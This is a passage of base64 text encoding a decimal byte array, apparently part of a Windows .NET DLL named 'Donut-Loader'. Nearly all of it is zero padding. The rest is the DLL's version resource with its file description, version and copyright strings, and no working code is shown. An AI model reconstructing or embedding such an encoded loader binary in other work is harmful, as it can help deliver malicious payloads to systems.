wgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMTYsIDAsIDAsIDAsIDI0LCAwLCAwLCAxMjgsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEsIDAsIDEsIDAsIDAsIDAsIDQ4LCAwLCAwLCAxMjgsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDAsIDAsIDcyLCAwLCAwLCAwLCA4OCwgNjQsIDAsIDAsIDI1MiwgMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMjUyLCAyLCA1MiwgMCwgMCwgMCwgODYsIDAsIDgzLCAwLCA5NSwgMCwgODYsIDAsIDY5LCAwLCA4MiwgMCwgODMsIDAsIDczLCAwLCA3OSwgMCwgNzgsIDAsIDk1LCAwLCA3MywgMCwgNzgsIDAsIDcwLCAwLCA3OSwgMCwgMCwgMCwgMCwgMCwgMTg5LCA0LCAyMzksIDI1NCwgMCwgMCwgMSwgMCwgMCwgMCwgMSwgMCwgMjgsIDgwLCAzOSwgMjgsIDAsIDAsIDEsIDAsIDI4LCA4MCwgMzksIDI4LCA2MywgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjgsIDAsIDAsIDAsIDEsIDAsIDg2LCAwLCA5NywgMCwgMTE0LCAwLCA3MCwgMCwgMTA1LCAwLCAxMDgsIDAsIDEwMSwgMCwgNzMsIDAsIDExMCwgMCwgMTAyLCAwLCAxMTEsIDAsIDAsIDAsIDAsIDAsIDM2LCAwLCA0LCAwLCAwLCAwLCA4NCwgMCwgMTE0LCAwLCA5NywgMCwgMTEwLCAwLCAxMTUsIDAsIDEwOCwgMCwgOTcsIDAsIDExNiwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTc2LCA0LCA5MiwgMiwgMCwgMCwgMSwgMCwgODMsIDAsIDExNiwgMCwgMTE0LCAwLCAxMDUsIDAsIDExMCwgMCwgMTAzLCAwLCA3MCwgMCwgMTA1LCAwLCAxMDgsIDAsIDEwMSwgMCwgNzMsIDAsIDExMCwgMCwgMTAyLCAwLCAxMTEsIDAsIDAsIDAsIDU2LCAyLCAwLCAwLCAxLCAwLCA0OCwgMCwgNDgsIDAsIDQ4LCAwLCA0OCwgMCwgNDgsIDAsIDUyLCAwLCA5OCwgMCwgNDgsIDAsIDAsIDAsIDY4LCAwLCAxMywgMCwgMSwgMCwgNzAsIDAsIDEwNSwgMCwgMTA4LCAwLCAxMDEsIDAsIDY4LCAwLCAxMDEsIDAsIDExNSwgMCwgOTksIDAsIDExNCwgMCwgMTA1LCAwLCAxMTIsIDAsIDExNiwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgMCwgMCwgNjgsIDAsIDExMSwgMCwgMTEwLCAwLCAxMTcsIDAsIDExNiwgMCwgNDUsIDAsIDc2LCAwLCAxMTEsIDAsIDk3LCAwLCAxMDAsIDAsIDEwMSwgMCwgMTE0LCAwLCAwLCAwLCAwLCAwLCA2NCwgMCwgMTUsIDAsIDEsIDAsIDcwLCAwLCAxMDUsIDAsIDEwOCwgMCwgMTAxLCAwLCA4NiwgMCwgMTAxLCAwLCAxMTQsIDAsIDExNSwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgMCwgMCwgNDksIDAsIDQ2LCAwLCA0OCwgMCwgNDYsIDAsIDU1LCAwLCA1MCwgMCwgNDgsIDAsIDU1LCAwLCA0NiwgMCwgNTAsIDAsIDQ4LCAwLCA1MywgMCwgNDgsIDAsIDU2LCAwLCAwLCAwLCAwLCAwLCA2OCwgMCwgMTcsIDAsIDEsIDAsIDczLCAwLCAxMTAsIDAsIDExNiwgMCwgMTAxLCAwLCAxMTQsIDAsIDExMCwgMCwgOTcsIDAsIDEwOCwgMCwgNzgsIDAsIDk3LCAwLCAxMDksIDAsIDEwMSwgMCwgMCwgMCwgNjgsIDAsIDExMSwgMCwgMTEwLCAwLCAxMTcsIDAsIDExNiwgMCwgNDUsIDAsIDc2LCAwLCAxMTEsIDAsIDk3LCAwLCAxMDAsIDAsIDEwMSwgMCwgMTE0LCAwLCA0NiwgMCwgMTAwLCAwLCAxMDgsIDAsIDEwOCwgMCwgMCwgMCwgMCwgMCwgNjgsIDAsIDE1LCAwLCAxLCAwLCA3NiwgMCwgMTAxLCAwLCAxMDMsIDAsIDk3LCAwLCAxMDgsIDAsIDY3LCAwLCAxMTEsIDAsIDExMiwgMCwgMTIxLCAwLCAxMTQsIDAsIDEwNSwgMCwgMTAzLCAwLCAxMDQsIDAsIDExNiwgMCwgMCwgMCwgNjcsIDAsIDExMSwgMCwgMTEyLCAwLCAxMjEsIDAsIDExNCwgMCwgMTA1LCAwLCAxMDMsIDAsIDEwNCwgMCwgMTE2LCAwLCAzMiwgMCwgNTAsIDAsIDQ4LCAwLCA0OSwgMCwgNTcsIDAsIDAsIDAsIDAsIDAsIDc2LCAwLCAxNywgMCwgMSwgMCwgNzksIDAsIDExNCwgMCwgMTA1LCAwLCAxMDMsIDAsIDEwNSwgMCwgMTEwLCAwLCA5NywgMCwgMTA4LCAwLCA3MCwgMCwgMTA1LCAwLCAxMDgsIDAsIDEwMSwgMCwgMTEwLCAwLCA5NywgMCwgMTA5LCAwLCAxMDEsIDAsIDAsIDAsIDY4LCAwLCAxMTEsIDAsIDExMCwgMCwgMTE3LCAwLCAxMTYsIDAsIDQ1LCAwLCA3NiwgMCwgMTExLCAwLCA5NywgMCwgMTAwLCAwLCAxMDEsIDAsIDExNCwgMCwgNDYsIDAsIDEwMCwgMCwgMTA4LCAwLCAxMDgsIDAsIDAsIDAsIDAsIDAsIDYwLCAwLCAxMywgMCwgMSwgMCwgODAsIDAsIDExNCwgMCwgMTExLCAwLCAxMDAsIDAsIDExNywgMCwgOTksIDAsIDExNiwgMCwgNzgsIDAsIDk3LCAwLCAxMDksIDAsIDEwMSwgMCwgMCwgMCwgMCwgMCwgNjgsIDAsIDExMSwgMCwgMTEwLCAwLCAxMTcsIDAsIDExNiwgMCwgNDUsIDAsIDc2LCAwLCAxMTEsIDAsIDk3LCAwLCAxMDAsIDAsIDEwMSwgMCwgMTE0LCAwLCAwLCAwLCAwLCAwLCA2OCwgMCwgMTUsIDAsIDEsIDAsIDgwLCAwLCAxMTQsIDAsIDExMSwgMCwgMTAwLCAwLCAxMTcsIDAsIDk5LCAwLCAxMTYsIDAsIDg2LCAwLCAxMDEsIDAsIDExNCwgMCwgMTE1LCAwLCAxMDUsIDAsIDExMSwgMCwgMTEwLCAwLCAwLCAwLCA0OSwgMCwgNDYsIDAsIDQ4LCAwLCA0NiwgMCwgNTUsIDAsIDUwLCAwLCA0OCwgMCwgNTUsIDAsIDQ2LCAwLCA1MCwgMCwgNDgsIDAsIDUzLCAwLCA0OCwgMCwgNTYsIDAsIDAsIDAsIDAsIDAsIDcyLCAwLCAxNSwgMCwgMSwgMCwgNjUsIDAsIDExNSwgMCwgMTE1LCAwLCAxMDEsIDAsIDEwOSwgMCwgOTgsIDAsIDEwOCwgMCwgMTIxLCAwLCAzMiwgMCwgODYsIDAsIDEwMSwgMCwgMTE0LCAwLCAxMTUsIDAsIDEwNSwgMCwgMTExLCAwLCAxMTAsIDAsIDAsIDAsIDQ5LCAwLCA0NiwgMCwgNDgsIDAsIDQ2LCAwLCA1NSwgMCwgNTAsIDAsIDQ4LCAwLCA1NSwgMCwgNDYsIDAsIDUwLCAwLCA0OCwgMCwgNTMsIDAsIDQ4LCAwLCA1NiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCw